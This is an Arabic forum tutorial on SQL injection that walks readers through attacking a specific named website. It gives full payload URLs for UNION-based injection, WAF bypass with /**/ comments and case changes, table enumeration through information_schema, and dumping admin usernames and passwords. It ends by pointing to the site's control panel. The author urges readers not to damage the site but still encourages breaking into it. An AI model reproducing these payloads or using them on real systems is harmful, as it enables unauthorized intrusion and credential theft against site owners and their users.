احترف sql injection

[احمد24]

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

حبيت اقدم لكم هذا الدرس الشامل ل 90% مما تعلمته من sql injection

وان شاء الله رح نطبق على موقع مصاب

بشرط يا اخواني انو ما نخرب الموقع حتى يستفيد الاخرين وما نكون انانين حتى لا يغلق الموقع

يعني نستخرج الباس واليوزر وندخل لوحة التحكم بس وما نعمل اشي بالموقع
نبدا على بركة الله
هذا هو الموقع المصاب
http://watchtowerhypocrisy.com/index.php?id=11

الخطوة الاولى :

نضع ' التي تدعى single cotation وهي كبسة حرف الطاء ولكن عندما تكون اللغة بالانجليزي

بعد الرقم 11
فيصبح الرابط هكذا

http://watchtowerhypocrisy.com/index.php?id=11'
نلاحظ ظهور خطا sql

الخطوة الثانيه :

معرفة عدد العواميد المصابه

نحذف ال ' التي اضفناها ونضع الامر odred by 1-- فيصبح الرابط هكذا

http://watchtowerhypocrisy.com/index.php?id=11 order by 1--

نلاحظ اختفاء الخطا والان نزود الرقم ونضع بدلا من الواحد عدد اكبر مثلا 10 لم يظهر خطا

نزود الى 14 نلاحظ ظهور خطا نرجع الى 13 نلاحظ اختفاء الخطا اذا عدد العواميد المصابه 13 عمود
وهذا الرابط النهائي

http://watchtowerhypocrisy.com/index.php?id=11 20order by 13--

الخطوه الثالثه:

تحديد العمود المصاب فعليا

نعود الى الرابط الاصلي http://watchtowerhypocrisy.com/index.php?id=11
نضع الامر union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

نعد حتى الرقم 13 وهو عدد الاعمده المصابه فيصبح الرابط هكذا

http://watchtowerhypocrisy.com/index.php?id=11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

احدى المشاكل التي تواجهنا هي ال Forbidden

كيف نتخطاها؟؟؟؟؟؟؟؟؟
نضع قبل وبعد كلمة union هذا الرمز /**/ فيصبح الرابط هكذا

http://watchtowerhypocrisy.com/index.php?id=11 /**/union/**/ select 1,2,3,4,5,6,7,8,9,10,11,12,13--

اذا ظهرت مره اخرى ال Forbidden نضع الرمز /**/ قبل وبعد الامر select ايضا
نلاحظ اختفاء الخطا

ولكن لم يظهر العمود المصاب لماذا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

لاننا لم نضع اشارة الناقص قبل الرقم 11 وهو المتغير الموجود بالرابط الاصلي

اذا بعد وضع الناقص يصبح الرابط هكذا ويظر العمود المصاب وهو 2 و 6

http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,2,3,4,5,6,7,8,9,10,11,12,13--

الخطوة الرابعه:

معرفة اصدار القاعده

نضع مكان الرقم العمود المصاب (يعني مكان الرقم 2 او 6)الامر version() فيصبح الاستغلال هكذا

http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
اذا الاصدار 5 نستمر..........................


الخطوة الخامسه:

معرفة اسماء الجداول
نكمل على الاستغلال السابق يعني بعد الرقم 13

نكتب from information_schema.tables

ونكتب مكان العمود المصاب table_name

نلاحظ ظهور ال forbiden جننتنا هاي !!!!!!!!!!!! ههههههههه

طيب نضع /**/ قبل وبعد information_schema

يعني هكذا يصبح الامر

نكتب from /**/information_schema/**/.tables

الاستغلال النهائي
http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,table_name,3,4,5,6,7,8,9,10,11,12,13 from /**/information_schema/**/.tables--
طيب حتقلي ظهر عمود واحد فقط انا بجاوب؟؟؟؟؟

على نفس الاستغلال نضع بدلا من table_name التي كتبناها مكان العمود المصاب الامر
group_concat(table_name)
يصبح الاستغلال هكذا

http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12, 13 from /**/information_schema/**/.tables--

ولكن ظهرت ال forbiden جننتانا على الاخر هاي هههه

طيب نتخطاها نضع /**/ قبل group_concat

نلاحظ ما زبط
طيب هناك طريقه اخرى غير حرف من احرف group_concat من حرف صغير الى حرف كبير
مثلا انا اغير اول حرف من كل كلمه

Group_Concat
الاستغلال النهائي

http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,Group_Concat(table_name),3,4,5,6,7,8,9,10,11,12, 13 from /**/information_schema/**/.tables--

ظهرت الاعمده يا سلام نفتش في الاعمده المكتوبه باحرف صغيره على admin او user او member او Login
او اي شي قريب من هذه المعاني دقق النظر رح تلاقي admin

هلا رح اضع الاوامر الاخرى وانت عليك تفهمها حاسس حالي بشرح لولد بصف اول ههههه

الخطوة السادسه

http://watchtowerhypocrisy.com/index...,9,10,11,12,13 from /**/information_schema/**/.columns where table_name like char()--
بين القوسين رح نحط اسم الجدول وهو admin ولكن بتشفير الهكس هذا موقع للتشفير

http://shrsd.comli.com/ascii_conv.html

نكتب %admin% وننسخ الرقم ونضعه بين القوسين اللي بالخط الكبير في الرابط السابق

http://watchtowerhypocrisy.com/index...,9,10,11,12,13 from /**/information_schema/**/.columns where table_name like char(97, 100, 109, 105, 110)--

طلع اسماء الاعمدة احنا يهمنا ال الاسم والباس

الان الامر التالي
http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,Group_Concat(password,0x3a,username),3,4,5,6,7,8 ,9,10,11,12,13 from admin--

الان نبحث عن لوحة التحكم باستخدام برنامج Havij

ملاحظة ممكن المواقع تحط اكثر من لوحة ادمن للتمويه انت جرب الدخول عليها كلها

ومبروك الدخول الى لوحة التحكم

لوحة التحكم هي
http://watchtowerhypocrisy.com/control/

ارجو ان اكون وفق في هذا الشرح